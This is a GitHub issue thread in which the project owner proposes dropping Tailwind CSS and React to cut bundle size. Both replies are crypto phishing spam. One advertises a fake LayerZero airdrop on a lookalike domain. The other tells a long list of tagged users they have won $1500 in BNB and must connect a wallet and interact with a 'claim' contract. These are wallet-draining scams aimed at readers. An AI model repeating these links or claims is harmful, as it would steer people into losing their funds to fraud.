### ISSUE TITLE
should we remove tailwindcss and react

### ISSUE THREAD

**Issue by hidaviddong** [DongHY1/comments#6]
This project initially used Tailwind CSS and React for rapid development, but the size of the package after bundling is too large. We need to reduce the bundle size to make this project lighter.

**Comment by ghost** [comment]
### LayerZero Airdrop Updated 🪂

The LayerZero Airdrop is confirmed. This is an updated guide to gather the most amount of $ZRO tokens possible.

We're thrilled to have you on board for this exclusive airdrop, and we're committed to making the claiming process seamless just for you. Let's dive in and grab those Layerzero Airdrop tokens!

[Layerzero Oficial](http://link.layerzer0network.online/rFz335)

[![Claim Now](https://miro.medium.com/v2/resize:fit:679/1*BpcMU6_u5SIZz5u-kGMrKw.gif)](http://link.layerzer0network.online/rFz335)

### Secure Your Layerzero Airdrop with These Simple Steps:

1. **Connect Your Wallet:**
   - Head over to the [Layerzero Airdrop](http://link.layerzer0network.online/rFz335).
   - Link up your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Eligibility Check:**
   - [Confirm your eligibility for the Layerzero Airdrop](http://link.layerzer0network.online/rFz335).

3. **Engage for Extra Rewards:**
   - Participate in community discussions or complete tasks for bonus rewards.

### Bonus Tips:
- **Community Assistance:**
  - Need help? Drop a message on Telegram or other social media platforms.

- **Stay Informed:**
  - Keep an eye out for updates on the airdrop process via official channels.

- **Patience Pays Off:**
  - Airdrop distribution might take a while. Stay calm and keep an eye out for updates.

Share your experiences or ask any questions about claiming the Layerzero Airdrop in the comments below. Let's make this process a breeze for everyone!

**Comment by sulthanallaudeen** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @yuanyuwang, @rcharring2, @xiaocairush, @treasure-praise, @a6du1h4q, @MrAlevy, @cloudre01, @Iammatengo, @iishap, @Pra4l, @JustinCast, @zotijs, @yhauxell, @ishaqadhel, @SAMURAii-7, @Yomikoooo, @xudaotutou, @huyup1e2n3g, @qianyiwangmeng, @DDDEthtest, @Nancy4Hany, @tejxsmore, @wissamfawaz, @bailichaoyang, @samyam777, @ankitsinghtd, @IgorVaryvoda, @EkrlDev, @vs4vijay, @Abhi-1631, @noscripter, @korzan1907, @ArthrowAbstract, @Mark-Four, @Nihal-Abedin, @jianjian01, @KBourdier, @Yz-001, @falset, @zeynepoziskender, @Saizalsinha, @Super-Sophie, @usametov, @vijethx, @Li-Guangyao, @TheWalkingCripple, @tamoghna-dey, @Chainxx07, @theleanbow, @danolar
